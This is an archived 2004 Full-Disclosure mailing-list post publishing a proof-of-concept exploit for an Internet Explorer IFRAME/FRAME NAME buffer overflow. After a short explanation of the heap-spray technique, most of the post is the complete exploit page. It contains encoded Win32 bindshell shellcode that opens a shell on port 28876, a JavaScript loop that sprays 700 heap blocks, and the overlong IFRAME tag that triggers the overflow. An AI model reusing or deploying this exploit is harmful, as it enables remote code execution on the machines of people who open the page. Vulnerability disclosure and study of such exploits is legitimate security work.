[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

To: <full-disclosure@xxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
From: "Berend-Jan Wever" <skylined@xxxxxxxxxxxxxxx>
Date: Tue, 2 Nov 2004 01:41:43 +0100

Since nobody else posted an exploit I figured I might aswell slap the BoF 
together with my default exploit JavaScript for the scriptkiddies to rejoice 
and the sysadmins to worry about.
<TECHNICAL>

The JavaScript creates a large amount of heap-blocks filled with 0x0D byte 
nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 
0x0D0D0D0D. It's not the most efficient thing in the world but it works like a 
charm for most IE bugs.

The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04                      68 847B7071     PUSH    71707B84
7178EC09                      50              PUSH    EAX
7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.

We land inside one of the nopslide and slide on down to the shellcode. The 
shellcode is of the portbinding type, port 28876 to be exact. So now you know 
when to send me a happy birthday email...

The exploit will work with the <FRAME> and <IFRAME> tag, attached file uses 
<IFRAME>
</TECHNICAL>
<DUMMIES>
For all you guys that cannot setup their AV software right, you can download 
the attachment from one of the many mirrors of this list.
</DUMMIES>

Cheers,
SkyLined

ÿþ<HTML><!--

________________________________________________________________________________



    ,sSSSs,   Ss,       Internet 
Exploiter v0.1

   SS"  `YS'   '*Ss.    MSIE <IFRAME 
src=... name="..."> BoF PoC exploit

  iS'            ,SS"   Copyright (C) 
2003, 2004 by Berend-Jan Wever.

  YS,  .ss    ,sY"      
http://www.edup.tudelft.nl/~bjwever

  `"YSSP"   sSS         
<skylined@edup.tudelft.nl>

________________________________________________________________________________



  This program is free software; you 
can redistribute it and/or modify it 
under

  the terms of the GNU General Public 
License version 2, 1991 as published by

  the Free Software Foundation.



  This program is distributed in the 
hope that it will be useful, but 
WITHOUT

  ANY WARRANTY; without even the 
implied warranty of MERCHANTABILITY or 
FITNESS

  FOR A PARTICULAR PURPOSE.  See the 
GNU General Public License for more

  details.



  A copy of the GNU General Public 
License can be found at:

    
http://www.gnu.org/licenses/gpl.html

  or you can write to:

    Free Software Foundation, Inc.

    59 Temple Place - Suite 330

    Boston, MA  02111-1307

    USA.

-->



  <SCRIPT language="javascript">

    // Win32 MSIE exploit helper 
script, creates a lot of nopslides to 
land in

    // and/or use as return address. 
Thanks to blazde for feedback and 
idears.



    // Win32 bindshell (port 28876, 
'\0' free, looping). Thanks to HDM and

    // others for inspiration and 
borrowed code.

    shellcode = 
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

    // Nopslide will contain these 
bytes:

    bigblock = 
unescape("%u0D0D%u0D0D");

    // Heap blocks in IE have 20 dwords 
as header

    headersize = 20;

    // This is all very 1337 code to 
create a nopslide that will fit exactly

    // between the the header and the 
shellcode in the heap blocks we want.

    // The heap blocks are 0x40000 
dwords big, I can't be arsed to write 
good

    // documentation for this.

    slackspace = 
headersize+shellcode.length

    while (bigblock.length<slackspace) 
bigblock+=bigblock;

    fillblock = bigblock.substring(0, 
slackspace);

    block = bigblock.substring(0, 
bigblock.length-slackspace);

    
while(block.length+slackspace<0x40000) 
block = block+block+fillblock;

    // And now we can create the heap 
blocks, we'll create 700 of them to 
spray

    // enough memory to be sure enough 
that we've got one at 0x0D0D0D0D

    memory = new Array();

    for (i=0;i<700;i++) memory[i] = 
block + shellcode;

  </SCRIPT>

  <!--

    The exploit sets eax to 0x0D0D0D0D 
after which this code gets executed:

    7178EC02                      8B08  
          MOV     ECX, DWORD PTR [EAX]

    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx 
= 0x0D0D0D0D.

    7178EC04                      68 
847B7071     PUSH    71707B84

    7178EC09                      50    
          PUSH    EAX

    7178EC0A                      FF11  
          CALL    NEAR DWORD PTR [ECX]

    Again [0x0D0D0D0D] == 0x0D0D0D0D, 
so we jump to 0x0D0D0D0D.

    We land inside one of the nopslides 
and slide on down to the shellcode.

  -->

  <IFRAME 
SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
 
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC



"></IFRAME>

</HTML>

Follow-Ups:
- Re: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
  - From: morning_wood
- Re: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
  - From: Georgi Guninski

Prev by Date: [Full-Disclosure] [USN-15-1] lvm10 vulnerability
Next by Date: Re: [Full-Disclosure] OT-POLITICAL: (Was: www.georgewbush.com)
Previous by thread: [Full-Disclosure] [USN-15-1] lvm10 vulnerability
Next by thread: Re: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
Index(es):
- Date
- Thread